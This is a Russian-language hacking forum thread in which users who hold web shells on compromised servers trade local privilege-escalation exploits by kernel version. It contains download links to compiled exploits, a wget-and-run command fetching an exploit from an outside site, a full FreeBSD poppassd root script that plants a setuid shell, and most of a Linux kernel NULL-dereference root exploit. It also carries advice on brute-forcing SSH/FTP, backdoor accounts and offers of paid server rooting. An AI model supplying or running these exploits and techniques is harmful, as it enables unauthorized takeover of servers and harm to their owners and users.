У кого есть проверенный бекдор ? Мой отказывается конектится ((

Вообщем есть шелл на неком болгарском серваке.

Права на комманды урезаны но есть доступ в корень и во все директории (кроме root) сервака. Shadow закрыта.

Какие есть способы включить выполнения команд или наковырять пароль.

valyka80 said:
Вообщем есть шелл на неком болгарском серваке.
Права на
комманды
урезаны но есть доступ в корень и во все директории (кроме root) сервака. Shadow закрыта.
Какие есть способы включить выполнения команд или наковырять пароль.


mod_include (ssl)

:."]
.:[melkiy]:. said:
mod_include (ssl)


Это не вэтой директории?

/etc/cups/ssl

Да еще бы найти где находится этот модуль.

valyka80 said:
Держи в нете приват нашел,попробуй (у меня прокатило 2010г. апрель)
http://depositfiles.com/files/zg54idprg


2.6.18-164 берет данный сплоит

а 2.6.18-194 не хочет =(

Есть еще что то на данное ядро?

2.4.21-63.ELsmp #1 SMP Wed Oct 28 23:15:46 EDT 2009 i686

есть что-нибудь под это?

Linux 2.6.18-028stab067.4 #1 SMP Thu Jan 14 17:06:11 MSK 2010 x86_64

я так понял уже спрашивали, но нашли или нет, непонятно =\ ссыль на сплоент, чо дали - дохлая

в общем есть чо?

Ponchik said:
Linux 2.6.18-028stab067.4 #1 SMP Thu Jan 14 17:06:11 MSK 2010 x86_64
я так понял уже спрашивали, но нашли или нет, непонятно =\ ссыль на сплоент, чо дали - дохлая
в общем есть чо?


Вот все что есть.(в архиве скомпилированные еще есть)

http://filebeam.com/5aed9f29280365b7ba481ffc60414ac5

freezed said:
2.4.21-63.ELsmp #1 SMP Wed Oct 28 23:15:46 EDT 2009 i686
есть что-нибудь под это?


Только это есть.

http://filebeam.com/514a1fb283c97b8eba590cddf05829b2

2.6.26-2-vserver-amd64 #1 SMP Thu Nov 5 03:47:07 UTC 2009 x86_64?

valyka80 said:
Вот все что есть.(в архиве скомпилированные еще есть)
http://filebeam.com/5aed9f29280365b7ba481ffc60414ac5


ых... команды gcc там нет, такчо выбрал всё скомпилированное, залил, выставил права 755 и вот


Code:
sh-3.2$ ./2.6.18-128
mmap: Permission denied

sh-3.2$ ./2.6.18-164
mmap: Permission denied

sh-3.2$ ./2.6.18.194-kompilayr
!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l
←[32mAc1dB1tCh3z ←[0mVS Linux kernel 2.6 kernel 0d4y
$$$ K3rn3l r3l3as3: 2.6.18-028stab067.4
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
!!! N0t a RH3l k3rn3l
!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!

sh-3.2$ ./exploit
!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l
←[32mAc1dB1tCh3z ←[0mVS Linux kernel 2.6 kernel 0d4y
$$$ K3rn3l r3l3as3: 2.6.18-028stab067.4
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
!!! N0t a RH3l k3rn3l
!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!

sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache),504(psaserv)

печаль

Фараон said:
2.6.26-2-vserver-amd64 #1 SMP Thu Nov 5 03:47:07 UTC 2009 x86_64
?


http://filebeam.com/23db71fafb0ff30210065c0fc3fb2136

Правда здесь 2.6.27, но может прокатит.

этот попробуй,правда он сентябрь месяц.

http://risesecurity.org/exploits/linux-sendpage.c

Чё, есть чё?

Linux 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 i686

Dr..VATSON said:
Чё, есть чё?
Linux 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 i686


выше ссылка есть

valyka80 said:
выше ссылка есть


ссори декабрь нет

U.n.a.m.e. -.a.: Linux tripoli 2.6.25-NX.18-tripoli #

вобще то надо вместе с датой сборки показывать,но это sweb.ru - поэтому нет,не порутаешь.Если сайт очень нужен и есть вмз,стучи - расколдую)

$n@ke said:
вобще то надо вместе с датой сборки показывать,но это sweb.ru - поэтому нет,не порутаешь.Если сайт очень нужен и есть вмз,стучи - расколдую)


uname -a: Linux tripoli 2.6.25-NX.18-tripoli #1 SMP Tue Jan 26 16:34:23 MSK 2010 i686

кое кто пасмарел и сказал ничего там не получится, не актуально

в смысле пост этот не читайте

==========

И снова здравствуйте

У мну тут

Linux 2.6.18-92.el5xen #1 SMP Tue Jun 10 19:20:18 EDT 2008 x86_64

Пробовал вот это вот

https://rdot.org/forum/showthread.php?p=1096

залил файлы, выставил права 0755 на run_null_exploits.sh и запустил


Code:
sh-3.2$ ./run_null_exploits.sh
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_sieve.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
Pulseaudio does not exist!
[+] Personality set to: PER_SVR4

в гугле рылся, так и не понял чего ему от меня надо

как порутать?

Кто нибудь компилил такой сплоит Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) ?

У меня ошибку выдал, думаю что вызвано отсутсвием Phonet протокола или компонента.


sh-3.2$ gcc -w 1.c -o 1
1.c: In function 'main':
1.c:123: error: 'PF_PHONET' undeclared (first use in this function)
1.c:123: error: (Each undeclared identifier is reported only once
1.c:123: error: for each function it appears in.)
1.c:161: error: 'AF_PHONET' undeclared (first use in this function)


Если кто скомпилит или имеет скомпилированную версию, выложите пожалуйста.

2.6.24-24-server #1 SMP Tue Jul 7 19:39:36 UTC 2009 x86_64

Ubuntu 8.04.4 LTS

2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 EDT 2009 i686

чет ни че не берет 0_о...мб кто че подкинет

Под такое есть что-то?

Linux icpu474 2.6.28.8-20100125a-iscsi-ntacker-fasync-mremap-grsec #1 SMP Mon Jan 25 13:27:19 CET 2010 i686 GNU/Linux

Linux 2.6.18-92.1.6.el5PAE #1 SMP Fri Jun 20 02:51:01 EDT 2008 i686 i686 i386 GNU/Linux

Кто какие сплойты посоветует?

Что можно использовать для этого?:

FreeBSD 5.5-RELEASE #1: Fri Feb 5 15:11:48 UTC 2010

uname -a: Linux debian 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686

есть чтото? имеется пхп шел

ламерский вопрос

Вот залил пхп-шелл на уязвимый сайт, сделал им бэкконнект на себя, в итоге получил шелл с правами apache....

зарутить не получилось, т.к. сервер оказался залатанным, но я нашел часть дампа файла /etc/shadow т.е. с зашифрованными паролями....

можно ли как то через этот бэкконект-шел поменять себе права используя логин и пароль из этого дампа ??

т.к. 22 и 23 порты закрыты на сервере, открыты лишь 443 и 80.....

BaleHoK said:
2.6.24-24-server #1 SMP Tue Jul 7 19:39:36 UTC 2009 x86_64
Ubuntu 8.04.4 LTS
2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 EDT 2009 i686
чет ни че не берет 0_о...мб кто че подкинет


пробовал jessica и vmsplice ?

Всем привет,

есть серв, там несколько сот сайтов,

и они расположены по директориям: /home/$user/public_html/

как можно получить доступ к другим сайтам(директориям) и прочитать/редактировать файлы,

мои права $user

uname -a

выполни это команду и скинь сюда что получится.

p.s. только название сайта удали и название сервера что бы не спалить свой шелл

Набиваем посты товарищ?

А теперь по теме. Смотрим версию своего ядра, далее идем на : about-security.ws

там смотрим раздел exploit, выбираем нужный експлоит под свою версию, и пробуем рутануть.

А вобще поиск было бы юзать не плохо и читать первые страницы тем

Сори только зашел,

выполнил:

Linux serv01.server 2.6.28.5-grsec-sg2 #6 SMP Fri Feb 20 02:45:11 CST 2009 i686 i686 i386 GNU/Linux,

Вообще хотел бы узнать, если какие нибудь другие способы обхода ограничений, кроме получения рута?

Zilt0 said:
Сори только зашел,
выполнил:
Linux serv01.server 2.6.28.5-grsec-sg2 #6 SMP Fri Feb 20 02:45:11 CST 2009 i686 i686 i386 GNU/Linux,
Вообще хотел бы узнать, если какие нибудь другие способы обхода ограничений, кроме получения рута?


в паблике не чего вроде нету под твоё ядро.

по другому получить рута будет очень трудно, пробуй брутить фтп, ssh, может повезет

есть чтонибуть под это? FreeBSD 6.0-RELEASE #1: Fri Apr 6 03:40:04 MSD 2007 i386

Mr.Br0wn said:
в паблике не чего вроде нету под твоё ядро.
по другому получить рута будет очень трудно, пробуй брутить фтп, ssh, может повезет



А без рута, есть ли другие способы обхода,

вот, safe mod= off, open_basedir = no value, disable_function = no value,

права на каталог пользователя:

drwxr-x--- 26 $user nobody 4096 Jan 19 15:27 .

drwx--x--x 23 $user $user 4096 Feb 20 13:48 ..

если кто знает, можете отписаться в личку, могу отблагодарить финансово,

Подскажите под это есть чтото

2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 i686 i386 GNU/Linux

http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz

rootmd said:
http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz


Не получаеться

./run

mmap: Permission denied

./run: line 58: 20223 Aborted $PULSEAUDIO -k >&/dev/null

./run: line 58: 20224 Aborted $PULSEAUDIO --check >&/dev/null

** (process:20225): WARNING **: Error doing GetSessionForUnixProcess on ConsoleKit: org.freedesktop.DBus.GLib.UnmappedError.CkManagerE rror.Code0: Unable to lookup session information for process '20225'

** (process:20225): CRITICAL **: polkit_session_set_uid: assertion `session != NULL' failed

E: polkit.c: Cannot set UID on session object.

E: authkey.c: Failed to open cookie file '//.esd_auth': No such file or directory

E: authkey.c: Failed to load authorization key '//.esd_auth': Invalid argument

E: module.c: Failed to load module "module-esound-protocol-unix" (argument: ""): initialization failed.

E: main.c: Module load failed.

E: main.c: failed to initialize daemon.

process 20225: dbus_shutdown() called but connections were still live. This probably means the application did not drop all its references to bus connections.

D-Bus not built with -rdynamic so unable to print a backtrace

./run: line 58: 20225 Aborted $EXPLOIT_PULSEAUDIO $PWD/$EXPLOIT

Что может под это подойти?

Linux *.net 2.4.21-47.ELsmp #1 SMP Wed Jul 5 20:38:41 EDT 2006 i686

2.4.21 ----> http://about-security.ws/xploits/ptrace.zip ,

http://about-security.ws/xploits/ptrace-kmod.zip , http://about-security.ws/xploits/brk.zip или http://about-security.ws/xploits/brk2.zip

пробуй, если что, пиши в ПМ помогу с рутом.

Mr.Br0wn said:
2.4.21 ---->
http://about-security.ws/xploits/ptrace.zip
,
http://about-security.ws/xploits/ptrace-kmod.zip
,
http://about-security.ws/xploits/brk.zip
или
http://about-security.ws/xploits/brk2.zip
пробуй, если что, пиши в ПМ помогу с рутом.


Ничего из этого не помогло((

пишет "Permission denied"

Напиши свой контакт в пм. Рутну тебе сервак

пишет "Permission denied"


chmod +x

Linux sendpage3 exploit, пишет mmap: Permission denied, значит уязвимость уже нет?

System: Linux **** 2.6.18-164.11.1.el5.centos.plus #1 SMP Wed Jan 20 18:49:35 EST 2010

Получается нет. Прав не хватает.

rootmd said:
Linux sendpage3 exploit, пишет mmap: Permission denied, значит уязвимость уже нет?
System: Linux **** 2.6.18-164.11.1.el5.centos.plus #1 SMP Wed Jan 20 18:49:35 EST 2010


пробуй:

wget http://about-security.ws/xploits/2.6.18-164.zip

unzip 2.6.18-164.zip

chmod 777 2.6.18-164

./2.6.18-164

P.s. сплойтик уже скомпилирован)

mmap: Operation not permitted

Значит ядро пропатченное.

при использовании следующего сплойта:


Code:
#!/bin/sh
################################################## #########################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ###
# tested on FreeBSD 5.4-RELEASE ###
################################################## #########################

POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB=libutil.so.4

echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat > program.c
#include
#include
#include

void _init()
{
if (!geteuid()) {
remove("/etc/libmap.conf");
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL);
}
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/libmap.conf
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
su
if [ -f /tmp/xxxx ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/xxxx
else
echo "Sorry, exploit failed."
fi

вываливает следующая ошибка:

sh fuck.sh

: not found

: not found

FreeBSD Qpopper poppassd latest version local r00t exploit by kcope

umask: Illegal number: 0000

fuck.sh: 47: Syntax error: end of file unexpected (expecting "then")

В чём может быть ошибка? подскажите пожалуйста.

или дайте рабочий сплойт

----

Понял суть проблемы, не установлен: poppassd

есть ли у кого сплойты под 5.4? или можно ещё как-то повысить права?

Linux storm3u 2.6.32-27-vserver #49~ppa3-Ubuntu SMP Tue Dec 28 09:36:49 UTC 2010 x86_64 есть что-нибудь?

cat1vo said:
Linux storm3u 2.6.32-27-vserver #49~ppa3-Ubuntu SMP Tue Dec 28 09:36:49 UTC 2010 x86_64
есть что-нибудь?


ядро не рутимое, точнее пока что на него сплойтов нету

2.6.26.5-45.fc9

помогите, пожалуйста, найти сплоит под это ядро

ZARO said:
2.6.26.5-45.fc9
помогите, пожалуйста, найти сплоит под это ядро


выполни команду uname -a и выложи полностью версию ядра включая год

Здравствуйте, есть что под это ядро?

Linux l17 2.6.35.7-c-s-xxx #1 SMP Sun Oct 3 02:17:12 MSD 2010 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux

Cuko said:
Здравствуйте, есть что под это ядро?
Linux l17 2.6.35.7-c-s-xxx #1 SMP Sun Oct 3 02:17:12 MSD 2010 x86_64 Intel(R) Xeon(R) CPU X5650 @ 2.67GHz GenuineIntel GNU/Linux


Пробуй это


Code:
*
* Linux Kernel
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* How many bytes should we clear in our
* function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}

repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p> ((char *)sname + 5)&& !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p> (char *)sname&& *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" :
"");
fclose(f);
return addr;
}
}

fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

commit_creds(prepare_kernel_cred(0));
return -1;

}

/* Why do I do this? Because on x86-64, the address of
* commit_creds and prepare_kernel_cred are loaded relative
* to rip, which means I can't just copy the above payload
* into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
asm("mov $getroot, %rax; call *%rax;");
#else
asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
* via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;

memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);

if(ret> SHIFT;

payload = mmap((void *)(landing& ~0xfff), 2 * 4096,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

if ((long)payload == -1) {
printf(" Failed to mmap() at target address.\n");
return -1;
}

memcpy((void *)landing,&trampoline, 1024);

clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
&fildes, NULL, NULL, target);

sleep(1);

printf(" Triggering payload...\n");
ioctl(fildes[2], 0, NULL);

if(getuid()) {
printf(" Exploit failed to get root.\n");
return -1;
}

printf(" Got root!\n");
execl("/bin/sh", "/bin/sh", NULL);
}

Mr.Br0wn said:
Пробуй это


к сожалению нет,посыпалось кучу ерроров.

что именно написало?

попробуй скомпилить на другом компе

Есть такое 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64

Ничего рабочего не нашел, может у кого есть что-то...

ядро пропатченное, 2011 год, врятле что и найдешь

Mr.Br0wn said:
ядро пропатченное, 2011 год, врятле что и найдешь


Подписываюсь под каждым словом..Можно найти, но апдейт всё прикрыл.

DCrypt said:
Подписываюсь под каждым словом..Можно найти, но апдейт всё прикрыл.


ну есть вот такая фигня

http://www.youtube.com/watch?v=tsPkwkbBsms

Еще вопрос возник

2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686

Сплоит сработал, снял рута, если создаю юзера с gid=0 uid!=0 нормально можно залогинится, а если меняю uid на 0 (/etc/passwd) уже не могу по ssh зайти (Access denied);

Как правильно поступить?

Спасибо.

А для каких целей тебе нужно менять UID? пользуйся новым юзверем и норм

Mr.Br0wn said:
А для каких целей тебе нужно менять UID? пользуйся новым юзверем и норм


А новый в кучу директорий входить не хочет. Например в /www/hosts/domain.com/ уже не хотит.

Вот такой сервер.

Если сплойт сработал и ты получил рута, в принципе у тебя есть права на чтения всех директорий и папок.

В твоём случае хз что получилось)

Mr.Br0wn said:
выполни команду
uname -a
и выложи полностью версию ядра включая год


Linux 2.6.26.5-45.fc9.x86_64 #1 SMP Sat Sep 20 03:23:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

Mr.Br0wn said:
Если сплойт сработал и ты получил рута, в принципе у тебя есть права на чтения всех директорий и папок.
В твоём случае хз что получилось)


снял рута на бекконнекте, потом

useradd -g root username

passwd username

потом логинюсь по ssh - и вот не могу в папки заходить - по тому же ssh подымаю права сплоитом до uid=0 и всё нормально ходит.

Потому и хочу юзера с таким же уидом или как-нить так.

FreeBSD site.net 5.4-RELEASE-p7 FreeBSD 5.4-RELEASE-p7 #0: Fri Sep 9 14:20:59 MSD 2005 root@site.net


Рут возможно получить паблик эксплойтом? Не шарю в хеке

Linux 2.6.32-29-server #58-Ubuntu SMP Fri Feb 11 21:06:51 UTC 2011 x86_64

есть что нить под него?

N@b$ter said:
Linux 2.6.32-29-server #58-Ubuntu SMP Fri Feb 11 21:06:51 UTC 2011 x86_64
есть что нить под него?


под 2011 год точно не чего нету, да и не скоро что-то появится

Эксплоит нужен.

Linux 2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 23 15:57:10 EDT 2010 i686 i686 i386 GNU/Linux

FlaktW said:
Эксплоит нужен.
Linux 2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 23 15:57:10 EDT 2010 i686 i686 i386 GNU/Linux


http://fayloobmennik.net/459112

FlaktW said:
Эксплоит нужен.
Linux 2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 23 15:57:10 EDT 2010 i686 i686 i386 GNU/Linux


linux sendpage 3

Как получить root без сплоитов?

)) практически никак. теоретически - брутом, наебом (фейк ssh клиент) и т д

Linux - 2.6.18-194.17.4.el5 #1 SMP Mon Oct 25 15:51:32 EDT 2010 x86_64

:."]
.:[melkiy]:. said:
Linux - 2.6.18-194.17.4.el5 #1 SMP Mon Oct 25 15:51:32 EDT 2010 x86_64


У меня ноябрьский апдейт прокатил

http://fayloobmennik.net/459112

Кто то пробовал запускать

http://packetstormsecurity.org/files/view/99146/freebsd64netgraph-escalate.txt

или

http://www.exploit-db.com/exploits/9488/

на фришке 6.2-RELEASE ? Работает?

есть что-нибуть под

Linux lincoln 2.6.25-NX.18-lincoln #1 SMP Wed Feb 24 23:36:21 MSK 2010 i686

Linux *** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 10 18:17:40 EST 2010 x86_64​???

ребят помогите с вот этим.

Linux 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64

Freedom said:
ребят помогите с вот этим.
Linux 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64


/threadnav235697-20-10.html

Хелп плизззз)))

FreeBSD 6.2-RELEASE-p12 #2: Fri Oct 2 17:30:55 EDT 2009

http://packetstormsecurity.org/files/view/99146/freebsd64netgraph-escalate.txt

http://www.exploit-db.com/exploits/9488/

не катят. выдает:

Segmentation fault (core dumped)

vasykas said:
/threadnav235697-20-10.html
У меня ноябрьский апдейт прокатил
http://fayloobmennik.net/459112



не помог к сожалению (

ОППа. а его компилить на том же ядре надо ?.

на шелле к gcc доступа нет. компилил на своей машине.

Freedom said:
не помог к сожалению (
ОППа. а его компилить на том же ядре надо ?.
на шелле к gcc доступа нет. компилил на своей машине.


Если на своей скомпилил то я думаю все ок.

FreeBSD c9-w.ht-systems.ru 8.2-STABLE FreeBSD 8.2-STABLE #18: Tue Mar 15 17:42:34 MSK 2011 root@b32.ht-systems.ru:/u что можете посоветовать ?

у кого нить есть новый сплоент для 2.6.18-128 ?

ядро не новое но sendpage не прокануло

2.6.18-128.1.6.el5PAE #1 SMP Wed Apr 1 10:02:22 EDT 2009 i686

Konqi said:
у кого нить есть новый сплоент для 2.6.18-128 ?
ядро не новое но sendpage не прокануло
2.6.18-128.1.6.el5PAE #1 SMP Wed Apr 1 10:02:22 EDT 2009 i686


http://www.ksplice.com/uptrack/cve-2010-3081

ссылка на описание бага.

http://filebeam.com/6b62b61bbe49fa9dee1d96f96e4cb71b

ссылка на сплоит.

А в самом коде сплоита вроде надо закоментироваать строки на не нужную ветку.

FreeBSD *** 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Sun Jul 25 23:33:02 UTC 2010

Linux *** 2.6.30.9-102.fc11.i686.PAE #1 SMP Fri Dec 4 00:19:26 EST 2009 i686

Linux *** 2.6.32-gentoo-r7 #1 SMP Mon May 24 11:31:27 MSD 2010 x86_64

Linux *** 2.6.18-028stab070.7 #1 SMP Fri Oct 1 13:53:00 MSD 2010 i686

Linux *** 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 i686

Возьмется кто рутнуть? Достойная оплата. в пм

vasykas said:
http://www.ksplice.com/uptrack/cve-2010-3081
ссылка на описание бага.
http://filebeam.com/6b62b61bbe49fa9dee1d96f96e4cb71b
ссылка на сплоит.
А в самом коде сплоита
вроде
надо закоментироваать строки на не нужную ветку.


неа..

$$$ Kernel release: 2.6.18-128.1.6.el5PAE

$$$ Backdoor in LSM (1/3): checking...not present.

$$$ Backdoor in timer_list_fops (2/3): not available.

$$$ Backdoor in IDT (3/3): checking...not present.

Your system is free from the backdoors that would be left in memory

by the published exploit for CVE-2010-3081.

Darwin 10.7.0 Darwin Kernel Version 10.7.0

На это вообще что нить есть?

Konqi said:
неа..
$$$ Kernel release: 2.6.18-128.1.6.el5PAE
$$$ Backdoor in LSM (1/3): checking...not present.
$$$ Backdoor in timer_list_fops (2/3): not available.
$$$ Backdoor in IDT (3/3): checking...not present.
Your system is free from the backdoors that would be left in memory
by the published exploit for CVE-2010-3081.


Вот какой то еще нащел (бинарник)

http://filebeam.com/9393a4991ede9060280a869a3713ba3d

vasykas said:
Вот какой то еще нащел (бинарник)
http://filebeam.com/9393a4991ede9060280a869a3713ba3d




Code:
y0u fuq1ng f41l. g3t th3 fuq 0ut!

))

Есть шелл (Smart.Shell 1.0) на неком windows server

права на чтение системных файлов есть

как я могу повысить свои права?

Пытался закинуть радмина но в php.ini мах размер файла 2М а

у меня 5м радмин.

подскажите пож.

Linux 2.6.9-89.0.18.ELsmp #1 SMP Tue Dec 15 14:25:00 EST 2009 i686

Есть что?

Linux 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64

у кого нить есть скомпилированный сплоит для 2.6.18-194.17.1.el5 ?

Konqi said:
у кого нить есть скомпилированный сплоит для
2.6.18-194.17.1.el5
?


попробуй этот,может че в коде поправить надо:

http://filebeam.com/da60bc111fd179a71022c9e68d496245

Linux 2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 30 17:02:48 EDT 2010 i686

Linux 2.6.16.33-xenU #2 SMP Wed Aug 15 17:27:36 SAST 2007 x86_64


сплойты из enlightenment, не взяли.

FreeBSD 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008

не появился ли еше под 2.6.18-194.26.1.el5PAE #1 SMP Tue Nov 9 13:34:42 EST 2010 i686 ?

Code:
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Mar 10 00:29:48 UTC 2010 x86_64

Под вот это вот есть что-нибудь?

pipe, ksplice, sendpage, image че-то там не подошли... Они все 2009 года, я у нас обновленное 2010.

Tigger said:

Code:
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Mar 10 00:29:48 UTC 2010 x86_64

Под вот это вот есть что-нибудь?
pipe, ksplice, sendpage, image че-то там не подошли... Они все 2009 года, я у нас обновленное 2010.


накидал здесь все 2010г

http://filebeam.com/a153659750706aa439e299ae23a2a3f8

FlaktW said:
FreeBSD 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008


попробуй padlina2

компиляция вот так:

gcc -o padlina2 padlina2.c -lpthread

vasykas said:
накидал здесь все 2010г
http://filebeam.com/a153659750706aa439e299ae23a2a3f8


Спасибо!

Вечерком приду домой, посмотрю, что там

2.6.18-128.7.1.el5 #1 SMP Wed Aug 19 04:00:44 EDT 2009 i686

enlightenment не подошел

есть что нить ещё?

purlizes said:
2.6.18-128.7.1.el5 #1 SMP Wed Aug 19 04:00:44 EDT 2009 i686
enlightenment не подошел
есть что нить ещё?


оу, ядро старое, пробуй sendpage 3

http://pastebin.com/z8emZHez

Konqi said:
оу, ядро старое, пробуй sendpage 3
http://pastebin.com/z8emZHez


Не подошло.

Windows NT NS13 5.2 build 3790

Нет ли под 2.6.18-4-pve #1 SMP Wed Nov 24 05:32:29 CET 2010 i686 какого-нибудь сплоита? enlightenment и кислотные суки не помогли(

Кто нибудь сталкивался с этим сплоитом для FreeBSD:

php-litespeed-5.4

http://filebeam.com/658ecba25c21c8b595deae486b824078

2.6.18-164.9.1.el5PAE #1 SMP Tue Dec 15 21:41:47 EST 2009 i686

Darwin Kernel Version 10.6.0: Wed Nov 10 18:13:17 PST 2010

2.6.18-xen #1 SMP Tue Oct 16 13:07:35 PDT 2007 x86_64

2.6.18.8-xen-3.4.2 #1 SMP Thu Jun 17 13:35:56 PDT 2010 x86_64

2.6.34.6-xxxx-std-ipv6-32 #3 SMP Fri Sep 17 16:04:40 UTC 2010 i686

Из паблика все пробовал...мб кто чем поможет из своего опыта

2.6.34.6-xxxx-std-ipv6-32 #3 SMP Fri Sep 17 16:04:40 UTC 2010 i686


по идее должен подойти http://www.exploit-db.com/exploits/15285/


2.6.18-xen #1 SMP Tue Oct 16 13:07:35 PDT 2007 x86_64


должны пробить сплоиты из enlightenment

FreeBSD 7.1-RELEASE-p4 #5: Tue Mar 31 00:52:26 EDT 2009

есть что-нибудь? все что нашел перепробовал, не вылечил =\

immortalist said:
FreeBSD 7.1-RELEASE-p4 #5: Tue Mar 31 00:52:26 EDT 2009
есть что-нибудь? все что нашел перепробовал, не вылечил =\



пробовал этот?

http://www.exploit-db.com/exploits/15206/

Konqi said:
пробовал этот?
http://www.exploit-db.com/exploits/15206/


Спасибо, уже вылечили Осталось найти руткит под него =\\\

FreeBSD 5.5-RELEASE #4: Thu Apr 10 13:09:02 MSD 2008​Есть что-нибудь?

Ребят. В общем есть доступ к серверу(не рут) через шелл WSO. могу читать практические любые файлы из etc/ и тд.

shadow прочитать нельзя, все конфиги phpmyadmin и тд можно. хранится ли рутовый пароль к SQL где нибудь ? и как вообще можно с имеющимися данными поиметь сервак, без использования сплойтов. ?

Freedom said:
Ребят. В общем есть доступ к серверу(не рут) через шелл WSO. могу читать практические любые файлы из etc/ и тд.
shadow прочитать нельзя, все конфиги phpmyadmin и тд можно. хранится ли рутовый пароль к SQL где нибудь ? и как вообще можно с имеющимися данными поиметь сервак, без использования сплойтов. ?


Я думаю если есть доступ к:

ssh_host_dsa_key.pub

ssh_host_dsa_key

ssh_host_rsa_key

ssh_host_rsa_key.pub

то можно через telnet-ssh

можно попробовать через LDAP

vasykas said:
Я думаю если есть доступ к:
